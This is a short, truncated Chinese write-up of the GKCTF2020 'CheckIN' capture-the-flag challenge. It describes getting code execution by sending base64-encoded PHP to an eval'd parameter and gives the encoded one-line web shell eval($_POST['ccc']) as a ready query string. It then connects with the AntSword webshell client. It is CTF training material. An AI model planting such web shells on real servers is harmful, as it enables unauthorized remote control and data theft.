[GKCTF2020]CheckIN

向Ginkgo傳參,後面還有eval函數,先傳個phpinfo(); 試試,要傳base64編碼後的。 發現沒有問題,發現一大堆被禁的函數,php版本爲7.3。 接下來看看能不能穿一句話上去 eval($_POST[‘ccc’]); ?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs= 然後用蟻劍連接 可以看到flag和readflag; 權限不夠無法打開flag,readfl
本站公眾號
   歡迎關注本站公眾號,獲取更多信息